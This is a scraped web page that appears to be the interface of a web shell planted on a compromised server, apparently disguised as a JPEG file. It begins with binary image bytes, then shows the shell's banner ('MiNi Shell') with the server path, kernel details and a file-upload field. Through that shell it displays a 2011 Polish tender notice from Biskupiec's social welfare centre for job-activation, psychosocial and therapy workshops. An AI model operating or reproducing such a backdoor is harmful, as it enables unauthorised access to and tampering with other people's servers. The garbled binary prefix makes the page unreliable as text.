JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110418/117173-N-2011.html

<p class="kh_header"><b>Biskupiec: Przedmiotem zamówienia jest organizacja i przeprowadzenie warsztatów-szkoleń w ramach realizowanego przez Miejski Ośrodek Pomocy Społecznej w Biskupcu projektu systemowego Wyrównywanie szans w dostępie do zatrudnienia -program aktywizacji społeczno-zawodowej bezrobotnych, rodzin, niepełnosprawnych  realizowanego w gminie Biskupiec współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 117173 - 2011; data zamieszczenia: 18.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Niepodległości 3, 11-300 Biskupiec, woj. warmińsko-mazurskie, tel. 89 7152260, 7152513, faks 89 7152260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.bip.biskupiec.pl/17030,17206/17206/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: miejski ośrodek pomocy społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie warsztatów-szkoleń w ramach realizowanego przez Miejski Ośrodek Pomocy Społecznej w Biskupcu projektu systemowego Wyrównywanie szans w dostępie do zatrudnienia -program aktywizacji społeczno-zawodowej bezrobotnych, rodzin, niepełnosprawnych  realizowanego w gminie Biskupiec współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie warsztatów-szkoleń w ramach realizowanego przez Miejski Ośrodek Pomocy Społecznej w Biskupcu projektu systemowego Wyrównywanie szans w dostępie do zatrudnienia- -program aktywizacji społeczno-zawodowej bezrobotnych, rodzin, niepełnosprawnych  realizowanego w gminie Biskupiec współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
	Zamówienie realizowane będzie w formie szkoleń, indywidualnego doradztwa dla uczestników i uczestniczek projektu osób objętych kontraktem socjalnym KIS Realizacja 58 kontraktów socjalnych na rzecz osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej i korzystających z pomocy społecznej i osób objętych programem aktywności lokalnej PAL -Wspieramy Rodziny- na rzecz 10 rodzin niewydolnych w sferze opiekuńczo-wychowawczej oraz na rzecz 9 osobowej grupy osób niepełnosprawnych korzystających z pomocy społecznej w zakresach tematycznych, z których każdy stanowi odrębne zadanie, część:
Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 1 do SIWZ:

Część  I. Warsztaty umiejętności i kompetencji społecznych - 128 godzin  oraz indywidualne poradnictwo - 116 godzin (KIS) w terminie od podpisania umowy do 31. 08.2011

Kod CPV: 80570000-0 - usługi szkolenia w dziedzinie rozwoju osobistego

Zamówienie obejmuje: 
1. Warsztaty  umiejętności i kompetencji społecznych w ilości łącznej 128 godzin, prowadzone w 4 grupach edukacyjnych- 32 godz. zajęć dla grupy w cyklach spotkań jeden  dzień w tygodniu po 2 godz.  dla 58 osób- osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej i korzystających z pomocy społecznej. Zajęcia ukierunkowane na wzrost wiedzy i umiejętności w zakresie:
-  komunikacji interpersonalnej,
- wzmocnienie samooceny i poczucia własnej wartości,
-  radzenia sobie ze stresem i przezwyciężanie problemów życiowych,
-  poprawnych zachowań w środowisku rodziny oraz w pracy,
- pełnienia ról społecznych w rodzinie, środowisku, miejscu pracy
- wzmacniania motywacji do aktywności zawodowej i społecznej
- tworzenie pozytywnych więzi międzyludzkich,
-  wyznaczania celów życiowych i sposobów realizacji,
- umiejętności szukania i udzielania wsparcia ( wsparcie instytucjonalne, samopomoc,    grupa wsparcia),
-  rozwiązywania problemów związanych z uzależnieniami i przemocą w rodzinie 
2.  Indywidualne poradnictwo psychospołeczne - łącznie 116 godzin ( średnio na jednego  uczestnika  2 godziny) w  terminach zajęć warsztatowych - prowadzenie kart   indywidualnego poradnictwa dla 58 osób- osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej i korzystających z pomocy społecznej.
- Opracowanie i przeprowadzenie indywidualnych badań ewaluacyjnych z uczestnikami  zajęć  - w miesiącu maju  -  określających początkowy poziom wiedzy i umiejętności    w miesiącu sierpniu -  określających  poziom postępu wiedzy i umiejętności  oraz raportu ewaluacyjnego w zakresie uzyskanych efektów
-  Prowadzenie ewidencji obecności uczestników zajęć oraz informowanie zamawiającego o nieobecnościach na zajęciach 
- prowadzenie dziennika zajęć 
-  Sporządzanie miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z  wymogami zamawiającego 
- Zapewnienie  przez wykonawcę materiałów dydaktycznych
-Wykonawca zobowiązuje się wszelkie pomoce naukowe (rzutnik, laptop, flipchart itp.) zorganizować na własny koszt.
-Wykonawca zobowiązany jest do Załączenie do oferty programu merytorycznego warsztatów oraz  scenariusza badań  ewaluacyjnych

Zajęcia muszą być prowadzone w siedzibie zamawiającego - Klub Integracji Społecznej w Biskupcu ul. Niepodległości 4


Część II:  Warsztaty aktywizacji zawodowej - 128 godzin oraz indywidualne poradnictwo zawodowe - 116 godzin (KIS) w terminie od podpisania umowy do - 31. 08.2011

Kod CPV: 80570000-0 - usługi szkolenia w dziedzinie rozwoju osobistego

Zamówienie obejmuje: 
  Warsztaty aktywizacji zawodowej  ilości 128  godzin, prowadzone w 4 grupach  edukacyjnych -  32 godziny zajęć z grupą w cyklach spotkań 1 dzień w tygodniu w wymiarze 2 godzin dla 58 osób- osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej i korzystających z pomocy społecznej.
Zajęcia ukierunkowane są na wzrost wiedzy i umiejętności w zakresie:
	Aktywnych  i efektywnych sposobów  poszukiwania pracy,
	Przygotowania i sporządzania podstawowych dokumentów aplikacyjnych,
	Skutecznej komunikacji i autoprezentacji w kontaktach z pracodawcami,
	Form zatrudnienia istniejących na rynku pracy,
	Podniesienia świadomości uczestników w zakresie funkcjonowania w obszarze rynku pracy,
	Inicjowanie aktywności zawodowej uczestników
 2) Indywidualne poradnictwo zawodowe - łącznie 116 godzin ( średnio na jednego  uczestnika  2 godziny) w terminach zajęć warsztatowych - prowadzenie kart  indywidualnego poradnictwa dla 58 osób- osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej i korzystających z pomocy społecznej.
3)   Opracowanie i przeprowadzenie indywidualnych badań ewaluacyjnych z uczestnikami   zajęć  - w miesiącu maju  -  określających początkowy  poziom wiedzy i  umiejętności  zawodowych ;  w miesiącu sierpniu -  określających  poziom postępu wiedzy,  umiejętności   zawodowych oraz raportu ewaluacyjnego w zakresie uzyskanych efektów
4)  Prowadzenie ewidencji obecności uczestników zajęć
5) Prowadzenie dziennika zajęć oraz informowanie zamawiającego o nieobecnościach na zajęciach 
6)  Sporządzanie miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z  wymogami zamawiającego 
 7) Zapewnienie  przez wykonawcę materiałów dydaktycznych,
8) Wykonawca zobowiązuje się wszelkie pomoce naukowe (rzutnik, laptop, flipchart itp.) zorganizować na własny koszt.
9) Wykonawca zobowiązany jest załączyć do oferty scenariusz zajęć.  


Zajęcia muszą być prowadzone w siedzibie zamawiającego - Klub Integracji Społecznej w Biskupcu ul. Niepodległości 4


Część  III. 
 
Warsztaty edukacji prawnej - 48 godzin w ramach(PAL)-Pokonać bariery do zrealizowania w terminie od podpisania umowy do 30.10.2011


Kod CPV: 80570000-0 - usługi szkolenia w dziedzinie rozwoju osobistego

Zamówienie obejmuje: 

1)  Warsztaty edukacji prawnej  ilości łącznej 48 godzin, ,  prowadzone  w cyklach spotkań    jeden dzień w  tygodniu w wymiarze 2 godzin . dla 58 osób- osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej i korzystających z pomocy społecznej.
Zajęcia ukierunkowane są na wzrost wiedzy i umiejętności w zakresie
-    uprawnienia osób niepełnosprawnych w Polsce i Krajach Unii Europejskiej  wynikające z      przepisów prawa
 - prawa pracy dotyczącego osób niepełnosprawnych
  - możliwości zatrudnienia osób niepełnosprawnych w krajach UE 
  -  możliwości zakładania i prowadzenia spółdzielni socjalnej przez osoby niepełnosprawne
  - zagadnienia prawne  wynikające z ustawy o zatrudnieniu i instytucjach rynku pracy w  Odniesieniu do osób niepełnosprawnych
-    uprawnienia osób niepełnosprawnych w Polsce i Krajach Unii Europejskiej  wynikające z     przepisów prawa
   - zagadnienia prawne wynikające z ustawy o pomocy społecznej ( obowiązki i uprawnienia  klientów pomocy społecznej),
2)  Prowadzenie ewidencji obecności uczestników zajęć oraz informowanie zamawiającego o nieobecnościach
3) Prowadzenie dziennika zajęć
4)  Sporządzanie miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z   wymogami zamawiającego 
5) Przeprowadzenie badań ewaluacyjnych wśród uczestników zajęć oraz raportu końcowego z uzyskanych efektów

2. Warsztaty edukacji prawnej  w ramach KIS w terminie: 6.09 - 31. 10.2011

W ilości 64 godzin, prowadzone w 4 grupach  edukacyjnych  -  16  godzin zajęć z grupą w cyklach spotkań 1 dzień w  tygodniu po 2 godziny dla 58 osób- osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej i korzystających z pomocy społecznej.
1) Zajęcia ukierunkowane są na wzrost wiedzy i umiejętności w zakresie
 - prawa pracy ( formy nawiązywania i rozwiązywania stosunku pracy, umowy c.p, obowiązki   pracodawcy i pracownika ),
  - możliwości zatrudnienia w krajach UE ( uprawnienia i obowiązki pracodawców i  Pracownika)
  - zakładanie i prowadzenie działalności gospodarczej,
   - zagadnienia prawne  wynikające z ustawy o zatrudnieniu i instytucjach rynku pracy (  obowiązki i uprawnienia osób bezrobotnych)
   - zagadnienia prawne wynikające z ustawy o pomocy społecznej ( obowiązki i uprawnienia  klientów pomocy społecznej),
2) Wykonawca zobowiązuje się do prowadzenia ewidencji obecności uczestników zajęć oraz informowanie zamawiającego o nieobecnościach na zajęciach 
3) Prowadzenia dziennika zajęć 
4)  Sporządzania miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z     wymogami zamawiającego  
5) Zapewnienia  przez wykonawcę materiałów dydaktycznych,
7) Wykonawca zobowiązuje się wszelkie pomoce naukowe (rzutnik, laptop, flipchart itp.) zorganizować na własny koszt.
8) Wykonawca zobowiązany jest załączyć do oferty scenariusz zajęć warsztatowych oraz scenariusza ankiet ewaluacyjnych.

Zajęcia muszą być prowadzone w siedzibie zamawiającego - Klub Integracji Społecznej w Biskupcu ul. Niepodległości 4 w dwóch terminach: 


Część  IV. Warsztaty ekonomii społecznej - 64 godzin w terminie: 6.09 - 31. 10.2011

Kod CPV: 80570000-0 - usługi szkolenia w dziedzinie rozwoju osobistego

Zamówienie obejmuje: 
1.   Warsztaty ekonomii społecznej  w ilości  64 godzin łącznie,  prowadzone w 4 grupach  edukacyjnych -   dla grupy wynosi 16 godzin, prowadzone w cyklach spotkań raz w tygodniu po 2 godziny dla 58 osób- osób bezrobotnych, nieaktywnych zawodowo, będących w wieku aktywności zawodowej i korzystających z pomocy społecznej.
Zajęcia ukierunkowane są na wzrost wiedzy i umiejętności w zakresie:
-	zakładania i prowadzenia spółdzielni socjalnej,
-	zmotywowania uczestników do podjęcia inicjatywy założenia spółdzielni socjalnej oraz zapewnienie wsparcia merytorycznego.
2.  Prowadzenie ewidencji obecności uczestników zajęć oraz informowanie zamawiającego o nieobecnościach na zajęciach 
3. Prowadzenie dziennika zajęć 
4.  Sporządzanie miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z  wymogami zamawiającego 
5. Przeprowadzenie badań ewaluacyjnych wśród uczestników zajęć oraz raportu końcowego z uzyskanych efektów.
 6. Zapewnienie  przez wykonawcę materiałów dydaktycznych,
7. Wykonawca zobowiązuje się wszelkie pomoce naukowe (rzutnik, laptop, flipchart itp.) zorganizować na własny koszt.
8. Wykonawca zobowiązany jest załączyć do oferty scenariusz zajęć warsztatowych oraz scenariusza ankiet ewaluacyjnych



Zajęcia muszą być prowadzone w siedzibie zamawiającego - Klub Integracji Społecznej w Biskupcu ul. Niepodległości 4


Część  V. Realizacja 40 godzinnego programu  Szkoła dla rodziców i wychowawców na rzecz 10 rodzin niewydolnych w sferze opiekuńczo-wychowawczej w ramach (PAL)-Wspieramy rodziny w terminie  od podpisania umowy do 11.07.2011


Kod CPV: 80570000-0 - usługi szkolenia w dziedzinie rozwoju osobistego

Zamówienie obejmuje: 

1. realizację zajęć dla rodziców w cyklach  spotkań  jeden dzień w tygodniu po 4 godziny. 
Zajęcia ukierunkowane są na wzrost wiedzy i umiejętności rodziców w zakresie:
- radzenia sobie w codziennych kontaktach z dziećmi i młodzieżą, 
- naukę umiejętności lepszego porozumiewania się w rodzinie 
 - Lepszego poznania i zrozumienia  zachowania swojego dziecka oraz pogłębienia  z nim więź. 
- Metod wychowawczych. 
- budowania ciepłych relacji z dzieckiem opartych na wzajemnym szacunku i miłości.
- Rozwiązywania  konfliktów w rodzinie 
- Poznania konkretnych  sposobów i metod wychowawczych. 

2. Prowadzenie ewidencji obecności uczestników programu oraz informowanie zamawiającego o nieobecnościach na zajęciach,
3. Prowadzenie dziennika zajęć
4.  Przeprowadzenie badań ewaluacyjnych wśród uczestników zajęć oraz raportu końcowego z uzyskanych efektów.
5.  Zapewnienie przez oferenta materiałów dydaktycznych,
6. Wykonawca zobowiązuje się wszelkie pomoce naukowe (rzutnik, laptop, flipchart itp.) zorganizować na własny koszt.
7. Wykonawca zobowiązany jest załączyć do oferty scenariusz zajęć warsztatowych oraz scenariusza ankiet ewaluacyjnych.




Zajęcia muszą być prowadzone w siedzibie zamawiającego - Klub Integracji Społecznej w Biskupcu ul. Niepodległości 4

Część  VI. Warsztaty aktywizacji zawodowej - łącznie 48 godzin (PAL)-Pokonać bariery w terminie od podpisania umowy do 30.10.2011

Kod CPV: 80570000-0 - usługi szkolenia w dziedzinie rozwoju osobistego

Zamówienie obejmuje: 
1)  Warsztaty aktywizacji zawodowej  ilości łącznej  48  godzin, prowadzone przez okres 24 tygodni, w cyklach spotkań jeden dzień w tygodniu  w wymiarze 2 godzin zajęć na rzecz 9 osobowej grupy osób niepełnosprawnych.
Zajęcia ukierunkowane są na wzrost wiedzy i umiejętności w zakresie:
-	Aktywnych  i efektywnych sposobów  poszukiwania pracy,
-	Przygotowania i sporządzania podstawowych dokumentów aplikacyjnych,
-	Skutecznej komunikacji i autoprezentacji w kontaktach z pracodawcami,
-	Form zatrudnienia istniejących na rynku pracy,
-	Podniesienia świadomości uczestników w zakresie funkcjonowania w obszarze rynku pracy,
-	Inicjowanie aktywności zawodowej uczestników
2)  Prowadzenie ewidencji obecności uczestników zajęć oraz informowanie zamawiającego o nieobecnościach na zajęciach 
3)  Prowadzenie dziennika zajęć 
4)  Sporządzanie miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z    wymogami zamawiającego 
5. Przeprowadzenie badań ewaluacyjnych wśród uczestników zajęć oraz raportu końcowego z uzyskanych efektów.
6) Zapewnienie  przez wykonawcę materiałów dydaktycznych
7) Wykonawca zobowiązuje się wszelkie pomoce naukowe (rzutnik, laptop, flipchart itp.) zorganizować na własny koszt.
8) Załączenie do oferty programu merytorycznego warsztatów oraz  scenariusza badań     ewaluacyjnych.



Zajęcia muszą być prowadzone w siedzibie zamawiającego - Klub Integracji Społecznej w Biskupcu ul. Niepodległości 4

Część  VII. Warsztaty psychospołeczne - 48 godzin oraz indywidualne poradnictwo - 18 godzin (PAL)-Pokonać bariery od podpisania umowy do 30.10.2011

Kod CPV: 80570000-0 - usługi szkolenia w dziedzinie rozwoju osobistego

Zamówienie obejmuje: 

1)  Warsztaty  psychospołeczne  w ilości łącznej  - 48 godzin,  prowadzone  w cyklach spotkań  jeden dzień w tygodniu w wymiarze 2 godzin na rzecz 9 osobowej grupy osób niepełnosprawnych.
Zajęcia ukierunkowane na  wzrost wiedzy i  umiejętności w zakresie:
 -  komunikacji interpersonalnej,
- wzmocnienie samooceny i poczucia własnej wartości,
-  radzenia sobie ze stresem i przezwyciężanie problemów życiowych,
- wzmacniania motywacji do aktywności zawodowej i społecznej
- tworzenie pozytywnych więzi międzyludzkich,
-  wyznaczania celów życiowych i sposobów realizacji,
- umiejętności szukania i udzielania wsparcia ( wsparcie instytucjonalne, samopomoc,    grupa wsparcia),
-  rozwiązywania problemów związanych z uzależnieniami i przemocą w rodzinie 
2) Indywidualne poradnictwo psychospołeczne- - łącznie 18 godzin ( średnio na jednego  uczestnika  2 godziny) w  terminach zajęć warsztatowych - prowadzenie kart   indywidualnego poradnictwa na rzecz 9 osobowej grupy osób niepełnosprawnych.
3)  Prowadzenie ewidencji obecności uczestników zajęć oraz informowanie zamawiającego o nieobecnościach
4. prowadzenia dziennika zajęć
5)  Sporządzanie miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z   wymogami zamawiającego 
6) Przeprowadzenie badań ewaluacyjnych wśród uczestników zajęć oraz raportu końcowego z uzyskanych efektów
7) Zapewnienie  przez wykonawcę materiałów dydaktycznych,
8) Wykonawca zobowiązuje się wszelkie pomoce naukowe (rzutnik, laptop, flipchart itp.) zorganizować na własny koszt.
9) Wykonawca zobowiązuje się do załączenia do oferty programu merytorycznego warsztatów oraz  scenariusza badań ewaluacyjnych.


Zajęcia muszą być prowadzone w siedzibie zamawiającego - Klub Integracji Społecznej w Biskupcu ul. Niepodległości 4


Część  VIII. Zajęcia korekcyjno usprawniające - 48 godzin (PAL)-Pokonać bariery w terminie od podpisania umowy do 30.10.2011

Kod CPV: 92.00.00.00 - Usługi rekreacyjne, kulturalne i sportowe

Zamówienie obejmuje: 

1)  Korekcyjno usprawniające - w  ilości łącznej 48 godzin, ,  prowadzone    jeden dzień w  tygodniu w wymiarze 2 godzin na rzecz 9 osobowej grupy osób niepełnosprawnych.
Zajęcia ukierunkowane są na:
- podniesie sprawności ruchowej  z dostosowaniem do indywidualnych możliwości uczestnik  ( w Sali sportowej, zajęcia terenowe)

2) Prowadzenia dziennika zajęć 
3)  Prowadzenie ewidencji obecności uczestników zajęć oraz informowanie zamawiającego o nieobecnościach
4)  Sporządzanie miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z   wymogami zamawiającego 
5) Przeprowadzenie badań ewaluacyjnych wśród uczestników zajęć oraz raportu końcowego z uzyskanych efektów
6) Zapewnienie  przez wykonawcę zaplecza technicznego w zakresie realizacji zadania
7) wykonawca zobowiązany jest do zorganizowania i przeprowadzenia zajęć na terenie Biskupca
8) załączenie do oferty scenariusza zajęć korekcyjno-usprawniajacych
Oraz wskazanie bazy-adresu na terenie Biskupca , gdzie zajęcia będą realizowane

Część  IX. Warsztaty terapii zajęciowej (PAL)-Pokonać bariery w terminie od podpisania umowy do 30.10.2011

CPV:80570000-0 - usługi szkolenia w dziedzinie rozwoju osobistego

Zamówienie obejmuje: 

1) Warsztaty terapii zajęciowej - w ilości 48 godzin prowadzone jeden dzień w tygodniu w wymiarze 2 godzin na rzecz 9 osobowej grupy osób niepełnosprawnych
przy wykorzystaniu: ergoterapii, arterapii, biblioterapii, choreoterapii, muzykoterapii, 
2) Prowadzenia dziennika zajęć 
3)  Prowadzenie ewidencji obecności uczestników zajęć oraz informowanie zamawiającego o nieobecnościach
4)  Sporządzanie miesięcznych sprawozdań z realizacji przedmiotu zamówienia zgodnie z   wymogami zamawiającego 
5) Przeprowadzenie badań ewaluacyjnych wśród uczestników zajęć oraz raportu końcowego z uzyskanych efektów
 6) Zapewnienie  przez wykonawcę zaplecza technicznego w zakresie realizacji zadania
7) Zorganizowania i przeprowadzenia zajęć na terenie Biskupca
8) załączenie do oferty scenariusza zajęć warsztatowych
Oraz wskazanie bazy-adresu na terenie Biskupca , gdzie zajęcia będą realizowane.


Zamawiający zastrzega sobie prawo zmiany liczby osób uczestniczących w szkoleniach-warsztatach, w przypadku wystąpienia okoliczności uzasadniających niemożność przeprowadzenia szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, jednak nie więcej niż o 20 procent.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zamawiający przewidział zamówienia uzupełniające dotychczasowemu wykonawcy polegające na ewentualnym powtórzeniu tego samego rodzaju zamówień w okresie 3 lat od udzielenia zamówienia podstawowego -do 30% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art 22 ust 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art 22 ust 1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art 22 ust 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek opisany w pkt 3 Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże się dysponowaniem: 
 dla części I: jednym wykładowcą   wykształcenie wyższe o kierunku psychologia, socjologia,  tytuł trenera   grupowego umiejętności psychologicznych  z minimum 2   letnim doświadczeniem w realizacji tego typu zajęć dla osób bezrobotnych zagrożonych wykluczeniem społecznym
2) dla części II: jednym doradcą-ekspertem  wykształcenie wyższe kierunkowe w zakresie doradztwa zawodowego lub licencja doradcy zawodowego oraz minimum 2 letnie doświadczenie w realizacji tego typu zajęć dla osób bezrobotnych zagrożonych wykluczeniem społecznym, 
